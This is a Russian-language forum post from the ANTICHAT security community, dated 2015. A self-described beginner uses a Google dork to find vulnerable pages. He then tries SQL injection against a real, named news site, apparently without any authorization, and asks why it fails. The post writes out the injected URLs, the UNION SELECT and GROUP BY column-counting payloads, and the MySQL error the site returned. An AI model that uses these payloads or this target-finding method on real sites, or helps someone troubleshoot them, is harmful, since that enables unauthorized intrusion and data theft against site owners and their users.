Ваши вопросы по уязвимостям.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.

Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.

⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

#11

19.10.2015, 10:58

aldemko

Guest

Сообщений: n/a

Провел на форуме:
12627

Репутация: 0

Доброго времени суток

я совсем совсем новичек

и так имеем мануал /threads/43966/

затем через гугл ищу

Код:

Code:
inurl:news-full.php?id=

нашел ресурс

Код:

Code:
http://herorace.ru/news-full.php?id=1

при запросе

Код:

Code:
http://herorace.ru/news-full.php?id=1%27
выдает ошибку Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /var/www/u0093899/data/www/herorace.ru/news-full.php on line70

следуя по мануалу пишу еще один запрос http://herorace.ru/news-full.php?id=1 -- 
отображает тоже что и просто с 1 - опять же судя по мануалу все ок

дальше следуя по мануалу нужно найти число столбцов я использовал 1' UNION SELECT 1, 2 -- 
получалось http://herorace.ru/news-full.php?id=1' UNION SELECT 1, 2 -- 
пробовал после прописывать цифры, 3 и так далее, ошибка со страницы не пропадала, и я решил попробовать с кол-вом полей
1' GROUP BY 2 -- ошибка
1' GROUP BY 10 -- ошибка
1' GROUP BY 100 --
1' GROUP BY 1 -- ошибка - и тут я понял что я наверное что то не так делаю, так как в любом случае полей не может быть меньше чем 1
я решил попробовать 1' GROUP BY 0 -- и тоже ошибка

подскажите что не так делаю ?

спасиобо